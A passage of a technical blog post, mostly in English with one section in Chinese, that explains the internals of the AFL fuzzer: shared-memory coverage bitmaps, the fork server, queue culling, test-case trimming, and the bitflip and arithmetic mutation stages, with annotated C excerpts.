<h2 id="初始化"><a href="#初始化" class="headerlink" title="Initialization"></a>Initialization</h2><p>On entering main(), the current time is read and used to seed the RNG, then the arguments are parsed in a loop:</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">gettimeofday(&tv, &tz);<br>srandom(tv.tv_sec ^ tv.tv_usec ^ getpid());<br><br>while ((opt = getopt(argc, argv, "+i:o:f:m:t:T:dnCB:S:M:x:Q")) > 0)<br><br>  switch (opt) {<br><br>    case 'i': /* input dir */<br><br>      if (in_dir) FATAL("Multiple -i options not supported");<br>      in_dir = optarg;<br>      ...<br></code></pre></td></tr></table></figure><p>This is followed by a long run of directory handling and sanity-check functions.</p>
<h2 id="setup-shm"><a href="#setup-shm" class="headerlink" title="setup_shm()"></a>setup_shm()</h2><p>This function sets up the shared memory and the <code>virgin_*</code> bitmaps.</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">/* array definitions */<br>EXP_ST u8 virgin_bits[MAP_SIZE],  /* Regions yet untouched by fuzzing */<br>       virgin_tmout[MAP_SIZE],    /* Bits we haven't seen in tmouts */<br>       virgin_crash[MAP_SIZE];    /* Bits we haven't seen in crashes */<br>EXP_ST void setup_shm(void) {<br>  ...<br>  if (!in_bitmap) memset(virgin_bits, 255, MAP_SIZE);<br>  memset(virgin_tmout, 255, MAP_SIZE);<br>  memset(virgin_crash, 255, MAP_SIZE);<br></code></pre></td></tr></table></figure><p>All three state arrays are filled with 255 over their full MAP_SIZE (65536) bytes; <code>virgin_bits</code> is left alone when <code>-B</code> preloaded it from an existing bitmap file.</p><ul><li>virgin_bits: regions not yet touched by any fuzzing</li><li>virgin_tmout: tuples not yet seen in timeouts</li><li>virgin_crash: tuples not yet seen in crashes</li></ul><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">shm_id = shmget(IPC_PRIVATE, MAP_SIZE, IPC_CREAT | IPC_EXCL | 0600);<br>...<br>trace_bits = shmat(shm_id, NULL, 0);<br></code></pre></td></tr></table></figure><p><code>int shmget(key_t key, size_t size, int shmflg)</code> requests a shared memory segment of MAP_SIZE bytes:</p><ul><li>The first argument is IPC_PRIVATE: an IPC object created this way has key 0, so its identifier cannot be looked up by key from an unrelated process. Like an anonymous pipe it is only usable between related processes, which is exactly the situation here: the id is exported in the environment as <code>__AFL_SHM_ID</code> and inherited by the forked target, whose instrumentation attaches the same segment.</li><li>The second argument, MAP_SIZE, is 65536, the size of the segment.</li><li>The third argument, IPC_CREAT | IPC_EXCL | 0600, gives the creation flags and the mode<ul><li>0600: only the owner can read and write, so other users on the machine cannot read or tamper with the coverage map</li><li>IPC_CREAT: create the segment if it does not exist, otherwise open the existing one</li><li>IPC_EXCL: together with IPC_CREAT, fail instead of opening an existing segment, so the fuzzer never attaches to memory it did not create</li></ul></li></ul><p><code>void *shmat(int shm_id, const void *shm_addr, int shmflg)</code> attaches the shared memory:</p><ul><li><p>The first argument is the id of the segment</p></li><li><p>The second argument is usually NULL: shm_addr is the address at which the segment is mapped into the current process, and NULL lets the kernel choose</p></li><li><p>The third argument, shm_flg, is a set of flags, usually 0</p></li><li><p>It returns a pointer to the start of the segment, which is stored in trace_bits</p></li></ul>
<h2 id="Fork-Server"><a href="#Fork-Server" class="headerlink" title="Fork Server"></a>Fork Server</h2><p>Call chain: perform_dry_run(use_argv) -> calibrate_case(<em>argv</em>, q, use_mem, 0, 1) -> init_forkserver(argv)</p><p>perform_dry_run(): runs every initial test case exactly once, to check that the target behaves as expected before fuzzing starts</p><p>calibrate_case(): calibrates a new test case; only called while processing the input directory and whenever a new path is found</p><p>init_forkserver(): starts the fork server</p><ol><li><p>st_pipe[2] and ctl_pipe[2] are the status pipe and the control pipe</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">EXP_ST void init_forkserver(char** argv) {<br><br>  static struct itimerval it;<br>  int st_pipe[2], ctl_pipe[2];<br>  int status;<br>  s32 rlen;<br></code></pre></td></tr></table></figure></li><li><p>Then the fork server process is forked off and detached from the fuzzer</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">forksrv_pid = fork(); // the child becomes the fork server<br><br>if (forksrv_pid < 0) PFATAL("fork() failed"); // fork failed<br><br>if (!forksrv_pid) { // fork server code path<br>  ...<br>  setsid(); // put the child into its own session, fully detached<br></code></pre></td></tr></table></figure></li><li><p>The fork server's stdout and stderr are redirected to dev_null_fd</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">dup2(dev_null_fd, 1);<br>dup2(dev_null_fd, 2);<br>if (out_file) {<br>  dup2(dev_null_fd, 0);<br>} else {<br>  dup2(out_fd, 0);<br>  close(out_fd);<br>}<br>if (dup2(ctl_pipe[0], FORKSRV_FD) < 0) PFATAL("dup2() failed");<br>if (dup2(st_pipe[1], FORKSRV_FD + 1) < 0) PFATAL("dup2() failed");<br></code></pre></td></tr></table></figure><p>stdin depends on how the test case is delivered:</p><ul><li>if out_file is set (the target reads the file passed via @@), stdin is redirected to dev_null_fd</li><li>otherwise the target reads the test case from stdin, so out_fd (the test case file) is duplicated onto fd 0 and the now redundant out_fd is closed; stdin itself stays open</li></ul><p>After that the read end of the control pipe is moved to FORKSRV_FD (198) and the write end of the status pipe to FORKSRV_FD + 1 (199); these two fixed descriptor numbers are what the fork server code compiled into the target talks over.</p><p><a href="https://blog.csdn.net/weixin_30764045/article/details/116936359">dup and dup2 on Linux</a></p></li><li><p>A series of parameter settings precedes execv; they are skipped here. If execv fails, the parent learns about it through trace_bits = EXEC_FAIL_SIG (written into the bitmap):</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">execv(target_path, argv);<br><br>/* Use a distinctive bitmap signature to tell the parent about execv()<br>   falling through. */<br><br>*(u32*)trace_bits = EXEC_FAIL_SIG;<br>exit(0);<br></code></pre></td></tr></table></figure></li><li><p>On the parent side fsrv_ctl_fd = ctl_pipe[1] is used for writing and fsrv_st_fd = st_pipe[0] for reading. Once set up, the parent waits for the fork server's hello:</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">/* Close the unneeded endpoints. */<br>close(ctl_pipe[0]);<br>close(st_pipe[1]);<br><br>fsrv_ctl_fd = ctl_pipe[1];<br>fsrv_st_fd = st_pipe[0];<br>// wait for the fork server's hello<br>it.it_value.tv_sec = ((exec_tmout * FORK_WAIT_MULT) / 1000);<br>it.it_value.tv_usec = ((exec_tmout * FORK_WAIT_MULT) % 1000) * 1000;<br><br>setitimer(ITIMER_REAL, &it, NULL);<br>rlen = read(fsrv_st_fd, &status, 4);<br><br>it.it_value.tv_sec = 0;<br>it.it_value.tv_usec = 0;<br>setitimer(ITIMER_REAL, &it, NULL);<br>if (rlen == 4) {<br>  OKF("All right - fork server is up.");<br>  return;<br>}<br></code></pre></td></tr></table></figure><ul><li>The 4 bytes are the hello that the fork server code inside the instrumented target writes to FORKSRV_FD + 1 at startup; if exactly 4 bytes arrive, everything is fine and the function returns</li><li>Otherwise the various failure cases are handled separately, a message is printed and the fuzzer exits</li></ul></li></ol>
<h2 id="fuzzing策略"><a href="#fuzzing策略" class="headerlink" title="Fuzzing strategy"></a>Fuzzing strategy</h2><p>Once all the initial setup is done, the fuzzer enters its main while loop.</p><p>First look at a central data structure, <code>queue_entry</code>:</p><ul><li>holds an input sample</li><li>holds the basic information gathered each time that sample was executed</li><li>entries are chained in a linked list</li></ul><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">struct queue_entry {<br><br>  u8* fname;                          /* File name for the test case      */<br>  u32 len;                            /* Input length                     */<br><br>  u8  cal_failed,                     /* Calibration failed?              */<br>      trim_done,                      /* Trimmed?                         */<br>      was_fuzzed,                     /* Had any fuzzing done yet?        */<br>      passed_det,                     /* Deterministic stages passed?     */<br>      has_new_cov,                    /* Triggers new coverage?           */<br>      var_behavior,                   /* Variable behavior?               */<br>      favored,                        /* Currently favored?               */<br>      fs_redundant;                   /* Marked as redundant in the fs?   */<br><br>  u32 bitmap_size,                    /* Number of bits set in bitmap     */<br>      exec_cksum;                     /* Checksum of the execution trace  */<br><br>  u64 exec_us,                        /* Execution time (us)              */<br>      handicap,                       /* Number of queue cycles behind    */<br>      depth;                          /* Path depth                       */<br><br>  u8* trace_mini;                     /* Trace bytes, if kept             */<br>  u32 tc_ref;                         /* Trace bytes ref count            */<br><br>  struct queue_entry *next,           /* Next element, if any             */<br>                     *next_100;       /* 100 elements ahead               */<br><br>};<br><br>static struct queue_entry *queue,     /* Fuzzing queue (linked list)      */<br>                          *queue_cur, /* Current offset within the queue  */<br>                          *queue_top, /* Top of the list                  */<br>                          *q_prev100; /* Previous 100 marker              */<br>static struct queue_entry*<br>  top_rated[MAP_SIZE];                /* Top entries for bitmap bytes     */<br></code></pre></td></tr></table></figure><p><code>top_rated[i]</code> holds, for each bitmap byte i, the queue entry currently considered best for that byte, i.e. the one with the smallest exec_us * len among all entries that hit it; cull_queue() is built on this table.</p>
<h3 id="cull-queue"><a href="#cull-queue" class="headerlink" title="cull_queue()"></a>cull_queue()</h3><p>Purpose: before each fuzz_one(), shrink the queue to a small set of favored entries that together still cover every bitmap byte seen so far</p><ol><li><p>In dumb mode, or when score_changed is 0 (the previous round did not update top_rated), return immediately</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (dumb_mode || !score_changed) return;<br></code></pre></td></tr></table></figure></li><li><p>Walk the queue and clear every favored flag</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">q = queue;<br>while (q) {<br>  q->favored = 0;<br>  q = q->next;<br>}<br></code></pre></td></tr></table></figure></li><li><p>Loop over the bitmap; for every index i that has a top_rated entry and whose bit is still set in temp_v, clear from temp_v all the bytes that entry's trace_mini covers, set its favored flag and count it in queued_favored; if the entry has not been fuzzed yet, also count it in pending_favored so it is scheduled first. temp_v starts out as all ones, so each bitmap byte is claimed by at most one entry</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">/* temp_v was memset to 0xff before this loop */<br>for (i = 0; i < MAP_SIZE; i++)<br>  if (top_rated[i] && (temp_v[i >> 3] & (1 << (i & 7)))) {<br>    u32 j = MAP_SIZE >> 3;<br>    while (j--)<br>      if (top_rated[i]->trace_mini[j])<br>        temp_v[j] &= ~top_rated[i]->trace_mini[j];<br><br>    top_rated[i]->favored = 1;<br>    queued_favored++;<br>    if (!top_rated[i]->was_fuzzed) pending_favored++;<br>  }<br></code></pre></td></tr></table></figure></li><li><p>Walk the queue again and mark everything that did not get favored as redundant</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">q = queue;<br>while (q) {<br>  mark_as_redundant(q, !q->favored);<br>  q = q->next;<br>}<br></code></pre></td></tr></table></figure></li></ol>
<h3 id="if-queue-cur"><a href="#if-queue-cur" class="headerlink" title="if (!queue_cur)"></a>if (!queue_cur)</h3><p>Purpose: detect the end of a pass over the queue and start the next one</p><p>queue_cur points at the current queue entry; NULL means the previous pass reached the end of the list</p><p>If it is not NULL, the loop goes straight on to the next step</p><ol><li><p>Count the cycle and reset the per-cycle state</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">queue_cycle++;<br>current_entry     = 0;<br>cur_skipped_paths = 0;<br>queue_cur         = queue;<br></code></pre></td></tr></table></figure></li><li><p>seek_to comes from find_start_position(), which works out where to resume after a fuzzer restart</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">while (seek_to) {<br>  current_entry++;<br>  seek_to--;<br>  queue_cur = queue_cur->next;<br>}<br></code></pre></td></tr></table></figure><p>(only used in the first cycle after a restart) queue_cur is advanced by seek_to entries so the fuzzer carries on where the previous session stopped</p></li><li><p>Refresh the status screen, i.e. the terminal UI; this is called on every status change and in a few other places</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">show_stats();<br></code></pre></td></tr></table></figure></li><li><p>When not on a terminal, print the cycle number instead</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (not_on_tty) {<br>  ACTF("Entering queue cycle %llu.", queue_cycle);<br>  fflush(stdout);<br>}<br></code></pre></td></tr></table></figure></li><li><p>If queued_paths is unchanged, the whole cycle found no new path: if splicing is already on, cycles_wo_finds is incremented, otherwise splicing is switched on. The comment calls this a strategy change, but with -d splicing is on from the start, so only the counter moves; cycles_wo_finds is only used to judge whether fuzzing can be considered done and has no other effect</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (queued_paths == prev_queued) {<br><br>  if (use_splicing) cycles_wo_finds++; else use_splicing = 1;<br><br>} else cycles_wo_finds = 0;<br></code></pre></td></tr></table></figure></li><li><p>Record the current count for the next comparison</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">prev_queued = queued_paths;<br></code></pre></td></tr></table></figure></li><li><p>With the right options set, sync_fuzzers() imports test cases from the other fuzzer instances</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (sync_id && queue_cycle == 1 && getenv("AFL_IMPORT_FIRST"))<br>  sync_fuzzers(use_argv);<br></code></pre></td></tr></table></figure></li></ol>
<h3 id="关键执行函数fuzz-one"><a href="#关键执行函数fuzz-one" class="headerlink" title="The key function: fuzz_one()"></a><strong>The key function: fuzz_one()</strong></h3><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">skipped_fuzz = fuzz_one(use_argv);<br></code></pre></td></tr></table></figure><p>Finally the most important part.</p><p>fuzz_one() takes the current queue entry and fuzzes it</p><p>It returns 0 when the entry was fuzzed and 1 when it was skipped or bailed out</p><ol><li><p>First check whether any <em>favored, non-fuzzed</em> entries are still pending</p><p>If so, every entry ahead of them that is already fuzzed or not favored is skipped with 99% probability (SKIP_TO_NEW_PROB)</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (pending_favored) {<br>  if ((queue_cur->was_fuzzed || !queue_cur->favored) &&<br>      UR(100) < SKIP_TO_NEW_PROB) return 1;<br>}<br></code></pre></td></tr></table></figure></li><li><p>Even without pending favored entries, outside dumb mode, when the current entry is not favored and the queue holds more than 10 entries:</p><ul><li>past the first cycle, an entry that has never been fuzzed is skipped with 75% probability (SKIP_NFAV_NEW_PROB); so already in the first cycles a large share of the non-favored entries is skipped, which is affordable because perform_dry_run has executed every seed once anyway</li><li>otherwise it is skipped with 95% probability (SKIP_NFAV_OLD_PROB)</li></ul><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">else if (!dumb_mode && !queue_cur->favored && queued_paths > 10) {<br>  if (queue_cycle > 1 && !queue_cur->was_fuzzed) {<br>    if (UR(100) < SKIP_NFAV_NEW_PROB) return 1;<br>  } else {<br>    if (UR(100) < SKIP_NFAV_OLD_PROB) return 1;<br>  }<br>}<br></code></pre></td></tr></table></figure></li><li><p>The current test case is mapped straight into memory for speed</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">orig_in = in_buf = mmap(0, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);<br></code></pre></td></tr></table></figure></li><li><p>out_buf is not read from a file; it is effectively a malloc(len+1), and mmap would not make it any faster</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">out_buf</span> = ck_alloc_nozero(len)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li></ol><h3 id="fuzz-one-CALIBRATION"><a href="#fuzz-one-CALIBRATION" class="headerlink" title="fuzz_one CALIBRATION"></a><strong>fuzz_one CALIBRATION</strong></h3><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">if</span> (queue_cur-></span>cal_failed)<br></code></pre></td></tr></table></figure><p>只有存在cal_failed被标记才会执行</p><p>cal_failed在<code>calibrate_case()</code>中,发生以下情况会+1</p><ul><li>若测试时发生crash_mode(-C设置crash_mode为2,否则为0?)以外的fault</li><li>非dumb_mode,且第一次测试运行后trace_bits为空</li></ul><p>同时afl允许我们通过设置,即使发生上述情况,也不在此阶段执行CALIBRATION(通过令cal_failed=3)</p><p>该判定位于<code>perform_dry_run()</code></p><ul><li>设置timeout_given =2,则忽略FAULT_TMOUT</li><li>未设置crash_mode时,设置环境变量AFL_SKIP_CRASHES为1,忽略FAULT_CRASH</li></ul><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs abnf">if (cal_failures <span class="hljs-operator">=</span><span class="hljs-operator">=</span> queued_paths)<br>if (cal_failures * <span class="hljs-number">5</span> > queued_paths)<br></code></pre></td></tr></table></figure><p>然而,出现上述问题会使cal_failures++,若报错比例过高,就会要求你检查设置</p><p>回到fuzz_one,若校准错误小于3</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">res = calibrate<span class="hljs-constructor">_case(<span class="hljs-params">argv</span>, <span class="hljs-params">queue_cur</span>, <span class="hljs-params">in_buf</span>, <span class="hljs-params">queue_cycle</span> - 1, 
0)</span>;<br></code></pre></td></tr></table></figure><p>让存在校准问题的用例再次校准</p><ul><li>出现FAULT_ERROR,说明无法运行,直接放弃抢救,报错</li><li>出现crash_mode,接着往下运行</li><li>其他任何情况都跳过,cur_skipped_paths++</li></ul><h3 id="fuzz-one-TRIMMING"><a href="#fuzz-one-TRIMMING" class="headerlink" title="fuzz_one TRIMMING"></a>fuzz_one TRIMMING</h3><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">if</span> (!dumb_mode && !queue_cur-></span>trim_done){<br> u8 res = trim_case(argv, queue_cur, in_buf);<br> …………<br> <span class="hljs-function"><span class="hljs-title">queue_cur</span>-></span>trim_done = <span class="hljs-number">1</span>;<br> <span class="hljs-function"><span class="hljs-title">if</span> (len != queue_cur-></span><span class="hljs-function"><span class="hljs-title">len</span>) len = queue_cur-></span>len;<br>}<br>memcpy(out_buf, in_buf, len);<br></code></pre></td></tr></table></figure><p>非dumb_mode且该case尚未trim时执行</p><p>最后结果存储在out_buf</p><p><code>trim_case(char** argv, struct queue_entry* q, u8* in_buf)</code></p><ol><li><p>长度小于5直接返回</p></li><li><p>令<code>len_p2=2^x > q->len</code>,remove_len取len_p2/16与4的最大值</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">len_p2</span> = next_p2(q->len)<span class="hljs-comment">;</span><br><span class="hljs-attr">remove_len</span> = MAX(len_p2 / TRIM_START_STEPS, TRIM_MIN_BYTES)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li><li><p>循环判断remove_len是否大于最小步长max(len_p2 /1024,4),满足则继续,否则跳转到7</p><figure class="highlight 
reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-keyword">while</span> (remove_len >= <span class="hljs-constructor">MAX(<span class="hljs-params">len_p2</span> <span class="hljs-operator">/</span> TRIM_END_STEPS, TRIM_MIN_BYTES)</span>)<br></code></pre></td></tr></table></figure></li><li><p>格式化remove_len到tmp</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">sprintf(tmp, <span class="hljs-string">"trim %s/%s"</span>, <span class="hljs-constructor">DI(<span class="hljs-params">remove_len</span>)</span>, <span class="hljs-constructor">DI(<span class="hljs-params">remove_len</span>)</span>);<br></code></pre></td></tr></table></figure></li><li><p>内部循环,根据 remove_pos, trim_avail生成新case</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">while</span> (remove_pos < q-></span>len){<br><span class="hljs-function"><span class="hljs-title">write_with_gap</span>(in_buf, q-></span>len, remove_pos, trim_avail);<br>fault = run_target(argv, exec_tmout);<br>cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST);<br><span class="hljs-function"><span class="hljs-title">if</span> (cksum == q-></span>exec_cksum){……}<br><span class="hljs-keyword">else</span> remove_pos += remove_len<br>}<br></code></pre></td></tr></table></figure><p><code>static void write_with_gap(void* mem, u32 len, u32 skip_at, u32 skip_len)</code> 
</p><p>Purpose: leave out the skip_len bytes starting at skip_at; the content is written from mem (in_buf here) with that gap removed</p><p>The new case is run once to check whether the removal changes the bitmap</p><ul><li>if it does not, this reduction is kept</li><li>otherwise remove_pos is advanced by the step remove_len</li></ul></li><li><p>Halve remove_len and go back to step 3</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">remove_len >>= 1;<br></code></pre></td></tr></table></figure></li><li><p>needs_write = 1 (set inside the if of step 5) means the case must be updated: write in_buf to the file and refresh the bitmap information</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (needs_write) {<br> ck_write(fd, in_buf, q->len, q->fname);<br> memcpy(trace_bits, clean_trace, MAP_SIZE);<br> update_bitmap_score(q);<br>}<br></code></pre></td></tr></table></figure></li></ol><h3 id="fuzz-one-PERFORMANCE-SCORE"><a href="#fuzz-one-PERFORMANCE-SCORE" class="headerlink" title="fuzz_one PERFORMANCE SCORE"></a>fuzz_one PERFORMANCE SCORE</h3><ol><li><p>Call <code>calculate_score(queue_cur)</code> to compute the score of the current queue_cur</p></li><li><p>If skip_deterministic is set, or queue_cur->was_fuzzed, or queue_cur->passed_det = 1,</p><p>or if the current <code>queue_cur->exec_cksum % master_max</code> is not equal to master_id - 1,</p><p>jump to havoc_stage</p></li></ol><h2 id="fuzz-one变异"><a href="#fuzz-one变异" class="headerlink" title="fuzz_one mutation"></a>fuzz_one mutation</h2><p>Since this part of the code is fairly long, I approach it mainly by function, with selected code excerpts.</p><p>Mutation is divided into 6 stages:</p><ul><li><strong>SIMPLE BITFLIP (+dictionary construction) stage</strong></li><li><strong>ARITHMETIC INC/DEC stage</strong></li><li><strong>INTERESTING VALUES stage</strong></li><li><strong>DICTIONARY STUFF stage</strong></li><li><strong>RANDOM HAVOC stage</strong></li><li><strong>SPLICING stage</strong></li></ul><h3 id="SIMPLE-BITFLIP-dictionary-construction-阶段"><a href="#SIMPLE-BITFLIP-dictionary-construction-阶段" class="headerlink" title="SIMPLE BITFLIP (+dictionary construction) stage"></a><strong>SIMPLE BITFLIP (+dictionary construction) stage</strong></h3><p>Bit flipping: every operation works at the bit level, from 1 bit up to 32 bits</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">#define FLIP_BIT(_ar, _b) do { \<br> u8* _arf = (u8*)(_ar); \<br> u32 _bf = (_b); \<br> _arf[(_bf) >> 3] ^= (128 >> ((_bf) & 7)); \<br> } while (0)<br></code></pre></td></tr></table></figure><p><code>_ar</code> is the buffer being operated on, and <code>_b</code> selects the bit: byte index <code>(_bf) >> 3</code>, then the bit <code>(128 >> ((_bf) & 7))</code> within that byte (counting from the most significant bit down)</p><p>A single XOR therefore flips exactly the selected bit</p><h4 id="bitflip-1-x2F-1"><a href="#bitflip-1-x2F-1" class="headerlink" title="bitflip 1/1"></a>bitflip 1/1</h4><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">for (stage_cur = 0; stage_cur < stage_max; stage_cur++) {<br> stage_cur_byte = stage_cur >> 3;<br> FLIP_BIT(out_buf, stage_cur);<br> if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry;<br> FLIP_BIT(out_buf, stage_cur);<br> ……<br>}<br></code></pre></td></tr></table></figure><ol><li><p>The first flip walks over every bit of the case, flipping 1 bit at a time</p></li><li><p>If <code>common_fuzz_stuff()</code> returns 1 after the flip, the whole case is abandoned; otherwise the bit is flipped back</p></li><li><p>Detect tokens and add them</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">maybe_add_auto(a_collect, a_len);<br></code></pre></td></tr></table></figure><p>As I read the comment: if flipping each bit in a run of consecutive bits produces a new path every time, that run of bits is treated as a token</p></li></ol><p><code>common_fuzz_stuff(char** argv, u8* out_buf, u32 len)</code></p><ol><li><p>Run the program on the new case and obtain the fault</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">write_to_testcase(out_buf, len);<br>fault = run_target(argv, exec_tmout);<br></code></pre></td></tr></table></figure></li><li><p>Check for timeouts</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (fault == FAULT_TMOUT) {<br> if (subseq_tmouts++ > TMOUT_LIMIT) {<br> cur_skipped_paths++;<br> return 1;<br> }<br>} else subseq_tmouts = 0;<br></code></pre></td></tr></table></figure><ul><li><p>on FAULT_TMOUT, if subseq_tmouts (reset to zero for each case) has exceeded the limit, return 1</p></li><li><p>if the fault is not FAULT_TMOUT, subseq_tmouts = 0</p></li></ul></li><li><p>If the user asked the process to stop, return 1</p></li><li><p>Save valuable test cases (coverage growth, counter changes): <code>save_if_interesting()</code></p></li><li><p>Return 0</p></li></ol><h4 id="bitflip-2-x2F-1"><a href="#bitflip-2-x2F-1" class="headerlink" title="bitflip 2/1"></a>bitflip 2/1</h4><p>Flips 2 consecutive bits at a time, stepping 1 bit</p><h4 id="bitflip-4-x2F-1"><a href="#bitflip-4-x2F-1" class="headerlink" title="bitflip 4/1"></a>bitflip 4/1</h4><p>Flips 4 consecutive bits at a time, stepping 1 bit</p><h4 id="bitflip-8-x2F-8"><a href="#bitflip-8-x2F-8" class="headerlink" title="bitflip 8/8"></a>bitflip 8/8</h4><p>Adds the effector map; flips 8 consecutive bits at a time, stepping 8 bits</p><p>Similar to the token detection above: if flipping a byte produces a new path, that byte's position in the effector map is set to 1, otherwise 0. The goal is again to guide later mutation, identifying which positions are key parameters and bypassing useless data.</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">eff_map[0] = 1;<br>if (EFF_APOS(len - 1) != 0) {<br> eff_map[EFF_APOS(len - 1)] = 1;<br> eff_cnt++;<br>}<br></code></pre></td></tr></table></figure><p>Initially only the first and last positions are 1</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (cksum != queue_cur->exec_cksum) {<br> eff_map[EFF_APOS(stage_cur)] = 1;<br> eff_cnt++;<br>}<br></code></pre></td></tr></table></figure><p>Each time a new path is found, the position is set to 1</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (eff_cnt != EFF_ALEN(len) &&<br> eff_cnt * 100 / EFF_ALEN(len) > EFF_MAX_PERC) {<br> memset(eff_map, 1, EFF_ALEN(len));<br> blocks_eff_select += EFF_ALEN(len);<br>}<br></code></pre></td></tr></table></figure><p>If more than 90% of the positions turn out to be effective, the whole map is simply set to 1</p><p>Note that in dumb mode, or on a slave fuzzer, the effector map result is not used by the later stages</p><h4 id="bitflip-16-x2F-8"><a href="#bitflip-16-x2F-8" class="headerlink" title="bitflip 16/8"></a>bitflip 16/8</h4><p>Flips 16 consecutive bits at a time, stepping 8 bits</p><h4 id="bitflip-32-x2F-8"><a href="#bitflip-32-x2F-8" class="headerlink" title="bitflip 32/8"></a>bitflip 32/8</h4><p>Flips 32 consecutive bits at a time, stepping 8 bits</p><h3 id="ARITHMETIC-INC-x2F-DEC-阶段"><a href="#ARITHMETIC-INC-x2F-DEC-阶段" class="headerlink" title="ARITHMETIC INC/DEC stage"></a><strong>ARITHMETIC INC/DEC stage</strong></h3><p>Unlike bit flipping, this starts at the 8-bit level, and each operation is an addition or subtraction</p><h4 id="arith-8-x2F-8"><a href="#arith-8-x2F-8" class="headerlink" title="arith 8/8"></a>arith 8/8</h4><p>Adds to and subtracts from 8 bits at a time, stepping 8 bits</p><ol><li><p>Addressing: orig is the byte at the current position</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">for (i = 0; i < len; i++) {<br> u8 orig = out_buf[i];<br>}<br></code></pre></td></tr></table></figure></li><li><p>Skip positions whose effector map entry is 0</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (!eff_map[EFF_APOS(i)])<br></code></pre></td></tr></table></figure></li><li><p>Loop over the increments, computing the XOR described next each time; ARITH_MAX = 35 rounds in total</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">for (j = 1; j <= ARITH_MAX; j++)<br></code></pre></td></tr></table></figure></li><li><p>XOR orig with orig + j</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">u8 r = orig ^ (orig + j);<br></code></pre></td></tr></table></figure></li><li><p>A case that bitflip would already have produced must not be repeated, so such cases are skipped</p><p>Otherwise a new case is generated as orig + j and tested</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">if (!could_be_bitflip(r)) {<br><br> stage_cur_val = j;<br> out_buf[i] = orig + j;<br><br> if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry;<br> stage_cur++;<br><br>} else stage_max--;<br></code></pre></td></tr></table></figure></li><li><p>Likewise, a new case is generated as orig - j and tested</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">r = orig ^ (orig - j);<br>if (!could_be_bitflip(r)) {<br> stage_cur_val = -j;<br> out_buf[i] = orig - j;<br> ……<br>} else stage_max--;<br></code></pre></td></tr></table></figure></li><li><p>Restore the original case</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">out_buf[i] = orig;<br></code></pre></td></tr></table></figure></li></ol><h4 id="arith-16-x2F-8"><a 